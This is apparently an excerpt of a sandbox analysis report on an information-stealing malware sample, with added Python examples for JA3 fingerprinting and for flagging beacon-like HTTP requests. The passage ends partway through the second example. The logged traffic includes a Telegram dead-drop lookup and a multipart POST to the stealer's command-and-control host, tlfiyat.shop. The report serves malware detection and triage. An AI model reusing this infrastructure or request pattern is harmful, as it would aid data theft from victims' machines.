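The two JA3 values above are fingerprints of the TLS ClientHello the stealer's HTTP stack sends, which is why they recur across unrelated samples built on the same WinINet/Schannel configuration. The following is an added example, not part of the report, showing how such a fingerprint is derived: the ClientHello version, cipher list, extension list, supported groups and EC point formats are rendered as decimal strings, GREASE values are dropped, and the joined string is hashed with MD5. The ClientHello bytes are constructed in the block itself from a hand-picked cipher and extension list, so the resulting hash is illustrative and is not one of the two values listed above.

```python
"""Compute a JA3 fingerprint from a TLS ClientHello (added example, not the report's code).

The ClientHello is constructed below so the block runs offline; its JA3 is not
one of the fingerprints reported for this sample.
"""
import hashlib
import struct
from typing import List, Tuple


def _is_grease(value: int) -> bool:
    # GREASE values are 0x0a0a, 0x1a1a, ... 0xfafa: both bytes equal, low nibble 0xa.
    return (value & 0x0F0F) == 0x0A0A and (value >> 8) == (value & 0xFF)


def build_client_hello(version: int, ciphers: List[int],
                       extensions: List[Tuple[int, bytes]]) -> bytes:
    """Serialize a minimal TLS record carrying a ClientHello (constructed test input)."""
    body = struct.pack("!H", version) + b"\x00" * 32 + b"\x00"      # version, random, empty session id
    body += struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
    body += b"\x01\x00"                                               # one compression method: null
    ext_bytes = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack("!H", len(ext_bytes)) + ext_bytes
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def ja3_from_client_hello(record: bytes) -> Tuple[str, str]:
    """Return (ja3_string, ja3_md5) for a TLS record containing a ClientHello."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a TLS ClientHello record")
    p = 9                                                             # record header (5) + handshake header (4)
    version = struct.unpack_from("!H", record, p)[0]
    p += 2 + 32                                                       # client_version, random
    p += 1 + record[p]                                                # session id
    cs_len = struct.unpack_from("!H", record, p)[0]
    p += 2
    ciphers = [struct.unpack_from("!H", record, p + i)[0] for i in range(0, cs_len, 2)]
    p += cs_len
    p += 1 + record[p]                                                # compression methods
    exts: List[int] = []
    groups: List[int] = []
    formats: List[int] = []
    if p < len(record):
        end = p + 2 + struct.unpack_from("!H", record, p)[0]
        p += 2
        while p + 4 <= end:
            etype, elen = struct.unpack_from("!HH", record, p)
            p += 4
            data = record[p:p + elen]
            p += elen
            exts.append(etype)
            if etype == 10:                                           # supported_groups
                n = struct.unpack_from("!H", data, 0)[0]
                groups = [struct.unpack_from("!H", data, 2 + i)[0] for i in range(0, n, 2)]
            elif etype == 11:                                         # ec_point_formats
                formats = list(data[1:1 + data[0]])

    def fmt(values: List[int]) -> str:
        return "-".join(str(v) for v in values if not _is_grease(v))

    ja3 = ",".join([str(version), fmt(ciphers), fmt(exts), fmt(groups), fmt(formats)])
    return ja3, hashlib.md5(ja3.encode("ascii")).hexdigest()


# Constructed ClientHello: TLS 1.2, one GREASE cipher, one GREASE extension and group.
SAMPLE_HELLO = build_client_hello(
    0x0303,
    [0x2A2A, 0x1301, 0x1302, 0xC02B, 0xC02F],
    [
        (0x0A0A, b""),                                                # GREASE extension
        (0, b"\x00\x0f\x00\x00\x0cexample.test"),                     # server_name
        (10, b"\x00\x06\x2a\x2a\x00\x1d\x00\x17"),                    # supported_groups: GREASE, x25519, secp256r1
        (11, b"\x01\x00"),                                            # ec_point_formats: uncompressed
        (13, b"\x00\x04\x04\x03\x08\x04"),                            # signature_algorithms
    ],
)

if __name__ == "__main__":
    print(*ja3_from_client_hello(SAMPLE_HELLO), sep="\n")
```

Because the fingerprint covers only the ClientHello, a sample that uses the platform TLS stack shares its JA3 with every other program using that stack on the same Windows build; treat a JA3 match as corroboration of the Suricata and configuration hits above, not as a stand-alone verdict.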
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49741 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211 (2 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226 (18 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108 (2 occurrences)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (28 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00403C79 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 2_2_00403C79
Source: global traffic HTTP traffic detected: GET /sc1phell HTTP/1.1 | Host: t.me | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0 | Host: tlfiyat.shop | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCLnKzQEIitPNARjBy8wBGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected:
    GET /bundles/v1/edgeChromium/latest/SSR-extension.bb64361f77a4185b4ba3.js HTTP/1.1
    Host: ntp.msn.com
    Connection: keep-alive
    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://ntp.msn.com
    sec-ch-viewport-height: 876
    sec-ch-ua-arch: "x86"
    sec-ch-viewport-width: 1232
    sec-ch-ua-platform-version: "10.0.0"
    downlink: 1.3
    sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
    sec-ch-ua-bitness: "64"
    sec-ch-ua-model: ""
    sec-ch-prefers-color-scheme: light
    sec-ch-ua-platform: "Windows"
    device-memory: 8
    rtt: 100
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
    sec-ch-ua-full-version: "117.0.2045.47"
    sec-ch-dpr: 1
    ect: 4g
    Accept: */*
    sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=4FCB265BB40E4BFDB1995BFB422B8DA6.RefC=2025-01-23T07:20:35Z; USRLOC=; MUID=051600D928FF6F38109315A4299D6E6A; MUIDB=051600D928FF6F38109315A4299D6E6A; _EDGE_S=F=1&SID=27D53A2D9228664816682F50930F673C; _EDGE_V=1
Source: global traffic HTTP traffic detected:
    GET /bundles/v1/edgeChromium/latest/web-worker.c7d27109b98aa5c6a189.js HTTP/1.1
    Host: ntp.msn.com
    Connection: keep-alive
    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-viewport-height: 876
    sec-ch-ua-arch: "x86"
    sec-ch-viewport-width: 1232
    sec-ch-ua-platform-version: "10.0.0"
    downlink: 1.3
    sec-ch-ua-bitness: "64"
    sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
    sec-ch-ua-model: ""
    sec-ch-prefers-color-scheme: light
    sec-ch-ua-platform: "Windows"
    device-memory: 8
    rtt: 100
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
    sec-ch-ua-full-version: "117.0.2045.47"
    sec-ch-dpr: 1
    ect: 4g
    Accept: */*
    sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: same-origin
    Sec-Fetch-Dest: worker
    Referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=4FCB265BB40E4BFDB1995BFB422B8DA6.RefC=2025-01-23T07:20:35Z; USRLOC=; MUID=051600D928FF6F38109315A4299D6E6A; MUIDB=051600D928FF6F38109315A4299D6E6A; _EDGE_S=F=1&SID=27D53A2D9228664816682F50930F673C; _EDGE_V=1
Source: global traffic HTTP traffic detected:
    GET /bundles/v1/edgeChromium/latest/vendors.ed394b73f8f3e2ec5379.js HTTP/1.1
    Host: assets.msn.com
    Connection: keep-alive
    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://ntp.msn.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Referer: https://ntp.msn.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected:
    GET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1
    Host: assets.msn.com
    Connection: keep-alive
    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://ntp.msn.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Referer: https://ntp.msn.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected:
    GET /bundles/v1/edgeChromium/latest/common.fd6d811d83dd3b0c7b4f.js HTTP/1.1
    Host: assets.msn.com
    Connection: keep-alive
    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://ntp.msn.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Referer: https://ntp.msn.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected:
    GET /bundles/v1/edgeChromium/latest/experience.3e42f97db270237ebd3c.js HTTP/1.1
    Host: assets.msn.com
    Connection: keep-alive
    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://ntp.msn.com
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-site
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Referer: https://ntp.msn.com/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected:
    GET /crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
    Host: clients2.googleusercontent.com
    Connection: keep-alive
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: empty
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 'nonce-oCif3Ui5bugBXCyGPAKDJGUioeMHoZw5puyeKYSgUVs=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000005.00000003.1615303670.00001238025E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615564183.0000123803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615714479.0000123802514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style 
include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com equals www.facebook.com (Facebook)
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.comh`https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:8 equals www.facebook.com (Facebook)
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.comh`https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:8 equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.1751788782.00007BAC00B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: script-src 'nonce-oCif3Ui5bugBXCyGPAKDJGUioeMHoZw5puyeKYSgUVs=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: t.me
Source: global traffic DNS traffic detected: DNS query: tlfiyat.shop
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: assets.msn.com
Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic DNS traffic detected: DNS query: c.msn.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: global traffic DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknown HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----h4wb1dbiekng47q9hlxl
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
    Host: tlfiyat.shop
    Content-Length: 256
    Connection: Keep-Alive
    Cache-Control: no-cache
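The POST to tlfiyat.shop above is the one request in this capture that the report does not attribute to a browser process, and its shape differs from every Edge request around it: a multipart upload to `/`, a Firefox-on-macOS User-Agent sent from a Windows analysis VM, the capitalised `Connection: Keep-Alive` spelling, and none of the `Sec-Fetch-*` or `Accept-Encoding` headers a real browser adds. The following Python is an added example, not part of the sandbox report or of the sample, that scores captured request heads on exactly those traits so the beacon separates from the browser noise. The two sample requests are constructed for the example from the report's own entries; the header-shape heuristics (browsers always send `Accept-Encoding` and fetch metadata, `Keep-Alive` capitalisation is typical of WinINet/WinHTTP clients) are assumptions about client behaviour, not findings from the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Raw request heads as a proxy or sandbox would capture them. These two are
# CONSTRUCTED for this example from the report's "HTTP traffic detected"
# entries (one Edge asset fetch, one suspected beacon); they are not the
# sandbox's own output.
SAMPLE_REQUESTS = [
    "GET /bundles/v1/edgeChromium/latest/common.fd6d811d83dd3b0c7b4f.js HTTP/1.1\r\n"
    "Host: assets.msn.com\r\n"
    "Connection: keep-alive\r\n"
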